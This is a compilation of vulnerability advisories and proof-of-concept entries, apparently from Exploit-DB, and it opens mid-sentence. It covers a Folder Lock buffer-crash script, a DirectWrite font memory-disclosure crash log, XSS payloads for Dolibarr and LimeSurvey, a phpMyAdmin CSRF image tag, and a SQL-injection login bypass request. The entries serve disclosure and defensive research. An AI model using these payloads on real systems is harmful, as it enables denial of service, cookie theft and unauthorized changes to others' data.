and 3 extra non-minimized samples which also trigger the crash. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47381.zip

# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit # Date: 12.09.2019 # Vendor Homepage:https://www.newsoftwares.net/folderlock/ # Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe # Exploit Author: Achilles # Tested Version: 7.7.9 # Tested on: Windows 7 x64 # 1.- Run python code :Folder_Lock.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Folderlock and Click 'Enter Key' # 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key' # 5.- Click 'Submit' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"

Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (4368.698c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] ds:000001b9`94823000=?? 0:036> u DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] 00007ffe`b1ce47c2 0811 or byte ptr [rcx],dl 00007ffe`b1ce47c4 49ffc5 inc r13 00007ffe`b1ce47c7 48ffc1 inc rcx 00007ffe`b1ce47ca 66413bc3 cmp ax,r11w 00007ffe`b1ce47ce 7471 je DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841) 00007ffe`b1ce47d0 66ffc0 inc ax 00007ffe`b1ce47d3 ebd1 jmp DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6) 0:036> k # Child-SP RetAddr Call Site 00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad 01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe 02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0 03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6 04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6 05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30 06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b 07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 08 000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62 09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f 0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0 0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d 0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134 0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce 0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f 0f 000000a3`a00ed600 00007ffe`bf50143b d2d1!DrawingContext::Flush+0x96 10 000000a3`a00ed660 00007ffe`99d3551e d2d1!D2DDeviceContextBase<ID2D1DeviceContext6,ID2D1DeviceContext6,null_type>::EndDraw+0x13b 11 000000a3`a00ed7a0 00007ffe`99bca704 edgehtml!CDXRenderTarget::EndDrawD2D+0x66 12 000000a3`a00ed7d0 00007ffe`99bca4e8 edgehtml!CDXRenderTarget::EnsureRenderMode+0x184 13 000000a3`a00ed800 00007ffe`99d2db85 edgehtml!CDXRenderTarget::EndDraw+0x38 14 000000a3`a00ed850 00007ffe`99d2da0b edgehtml!CDispSurface::EndLayerToRenderTarget+0x145 15 000000a3`a00ed8f0 00007ffe`99bb585f edgehtml!CDispNodeDestination::EndRender+0x6b 16 000000a3`a00ed960 00007ffe`99cf60c1 edgehtml!CDispNodeDestination::EndRect+0xaf 17 000000a3`a00ed9a0 00007ffe`99bacf83 edgehtml!CDispDestinationDrawHelper::EndRect+0x31 18 000000a3`a00ed9d0 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x583 19 000000a3`a00edb40 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 1a 000000a3`a00edcd0 00007ffe`99baee43 edgehtml!CDispNode::DrawInternal+0x7ce 1b 000000a3`a00ee060 00007ffe`99bad747 edgehtml!CDispNode::Draw+0x943 1c 000000a3`a00ee270 00007ffe`99bad297 edgehtml!CDispContainer::DrawChildren+0x227 1d 000000a3`a00ee330 00007ffe`99bacbc8 edgehtml!CDispContainer::DrawSelfContentFullStackingContext+0x127 1e 000000a3`a00ee420 00007ffe`99b6e055 edgehtml!CDispContainer::DrawSelfContent+0x1c8 1f 000000a3`a00ee590 00007ffe`99b6f37e edgehtml!CDispContainer::DrawSelf+0x365 20 000000a3`a00ee720 00007ffe`99baead3 edgehtml!CDispNode::DrawInternal+0x7ce 21 000000a3`a00eeab0 00007ffe`99bba8fc edgehtml!CDispNode::Draw+0x5d3 22 000000a3`a00eecc0 00007ffe`99bb9b68 edgehtml!CDispRoot::DrawIndependentCompositionLayerTree+0x5c 23 000000a3`a00eedb0 00007ffe`99bb97f5 edgehtml!CDispRoot::DrawRoot+0x1b8 24 000000a3`a00ef000 00007ffe`99c3452c edgehtml!CPaintHandler::RenderInternal+0x2b5 25 000000a3`a00ef580 00007ffe`99b54ac8 edgehtml!CPaintHandler::RenderIfNeeded+0x7c 26 000000a3`a00ef5f0 00007ffe`99d3a80d edgehtml!CRenderThread::ProcessRenderWork+0xdc 27 000000a3`a00ef650 00007ffe`99c5fdb9 edgehtml!CRenderTaskDrawInPlace::Execute+0xad 28 000000a3`a00ef6c0 00007ffe`99d77542 edgehtml!CRenderThread::RenderThread+0x229 29 000000a3`a00ef760 00007ffe`c32937e4 edgehtml!CRenderThread::StaticRenderThreadProc+0x42 2a 000000a3`a00ef790 00007ffe`c5e1cb81 KERNEL32!BaseThreadInitThunk+0x14 2b 000000a3`a00ef7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21 --- cut --- We have minimized the test cases to a 1-byte difference in the EBLC table, and a 2-byte difference in the EBDT table in relation to the original files. The issue reproduces on a fully updated Windows 10 1709; we haven't tested other versions of the system. It could be used to disclose sensitive data from the process address space, which is clearly visible when opening the PoC HTML files in Edge. In most cases, instead of crashing, the browser will display random chunks of heap memory residing after the glyph's bitmap allocation. As shown in 1/poc.html and 2/poc.html, the problems are related to glyphs corresponding to characters with codes 0xF0 and 0x2020, respectively. Attached is a pair of minimized PoC fonts, original fonts, and HTML files to reproduce the bug in a browser. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47382.zip

# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross Site Scripting # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # CVE: CVE-2019-16197 # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of the User-Agent HTTP header is copied into the HTML document as plain text between tags, leading to XSS. GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

SEC Consult Vulnerability Lab Security Advisory < 20190912-0 > ======================================================================= title: Stored and reflected XSS vulnerabilities product: LimeSurvey vulnerable version: <= 3.17.13 fixed version: =>3.17.14 CVE number: CVE-2019-16172, CVE-2019-16173 impact: medium homepage: https://www.limesurvey.org/ found: 2019-08-23 by: Andreas Kolbeck (Office Munich) David Haintz (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Europe | Asia | North America https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "LimeSurvey is the tool to use for your online surveys. Whether you are conducting simple questionnaires with just a couple of questions or advanced assessments with conditionals and quota management, LimeSurvey has got you covered. LimeSurvey is 100% open source and will always be transparently developed. We can help you reach your goals." Source: https://www.limesurvey.org/ Business recommendation: ------------------------ LimeSurvey suffered from a vulnerability due to improper input and output validation. By exploiting this vulnerability an attacker could: 1. Attack other users of the web application with JavaScript code, browser exploits or Trojan horses, or 2. perform unauthorized actions in the name of another logged-in user. The vendor provides a patch which should be installed immediately. Furthermore, a thorough security analysis is highly recommended as only a short spot check has been performed and additional issues are to be expected. Vulnerability overview/description: ----------------------------------- 1) Stored and reflected XSS vulnerabilities LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability, which allows an attacker to execute JavaScript code with the permissions of the victim. In this way it is possible to escalate privileges from a low-privileged account e.g. to "SuperAdmin". Proof of concept: ----------------- 1) Stored and reflected XSS vulnerabilities Example 1 - Stored XSS (CVE-2019-16172): The attacker needs the appropriate permissions in order to create new survey groups. Then create a survey group with a JavaScript payload in the title, for example: test<svg/onload=alert(document.cookie)> When the survey group is being deleted, e.g. by an administrative user, the JavaScript code will be executed as part of the "success" message. Example 2 - Reflected XSS (CVE-2019-16173): The following proof of concept prints the current CSRF token cookie which contains the CSRF token. The parameter "surveyid" is not filtered properly: http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20 src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question If the URL schema is configured differently the following payload works: http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid= xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question Vulnerable / tested versions: ----------------------------- The vulnerabilities have been verified to exist in version 3.17.9 and the latest version 3.17.13. It is assumed that older versions are affected as well. Vendor contact timeline: ------------------------ 2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204 2019-09-02: Fixes available: https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006 2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues 2019-09-03: Release of LimeSurvey v3.17.15 bug fix 2019-09-12: Coordinated release of security advisory Solution: --------- Update to version 3.17.15 or higher: https://www.limesurvey.org/stable-release The vendor provides a detailed list of changes here: https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Europe | Asia | North America About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF A. Kolbeck / @2019

============================================= MGC ALERT 2019-003 - Original release date: June 13, 2019 - Last revised: September 13, 2019 - Discovered by: Manuel Garcia Cardenas - Severity: 4,3/10 (CVSS Base Score) - CVE-ID: CVE-2019-12922 ============================================= I. VULNERABILITY ------------------------- phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery II. BACKGROUND ------------------------- phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. phpMyAdmin supports a wide range of operations on MySQL and MariaDB. III. DESCRIPTION ------------------------- Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any server in the Setup page. IV. PROOF OF CONCEPT ------------------------- Exploit CSRF - Deleting main server <p>Deleting Server 1</p> <img src=" http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1" style="display:none;" /> V. BUSINESS IMPACT ------------------------- The attacker can easily create a fake hyperlink containing the request that wants to execute on behalf the user,in this way making possible a CSRF attack due to the wrong use of HTTP method. VI. SYSTEMS AFFECTED ------------------------- phpMyAdmin <= 4.9.0.1 VII. SOLUTION ------------------------- Implement in each call the validation of the token variable, as already done in other phpMyAdmin requests. VIII. REFERENCES ------------------------- https://www.phpmyadmin.net/ IX. CREDITS ------------------------- This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY ------------------------- June 13, 2019 1: Initial release September 13, 2019 2: Last revision XI. DISCLOSURE TIMELINE ------------------------- June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas June 13, 2019 2: Send to vendor July 16, 2019 3: New request to vendor without fix date September 13, 2019 4: Sent to lists XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ------------------------- Manuel Garcia Cardenas Pentester

# Exploit Title: Ticket-Booking 1.4 - Authentication Bypass # Author: Cakes # Discovery Date: 2019-09-14 # Vendor Homepage: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking # Software Link: https://github.com/ABHIJEET-MUNESHWAR/Ticket-Booking/archive/master.zip # Tested Version: 1.4 # Tested on OS: CentOS 7 # CVE: N/A # Description: # Easy authentication bypass vulnerability on this ticket booking application # allowing the attacker to remove any previously booked seats # Simply replay the below Burp request or use Curl (remember to change the Cookie Values) POST /ticket/cancel.php HTTP/1.1 Host: Target User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://Target/ticket/login.php Content-Type: application/x-www-form-urlencoded Content-Length: 50 Cookie: PHPSESSID=j9jrgserbga22a9q9u165uirh4; rental_property_manager=mq5iitk8ic80ffa8dcf28294d4 Connection: close Upgrade-Insecure-Requests: 1 DNT: 1 userid='%20or%200%3d0%20#&password=123&save=signin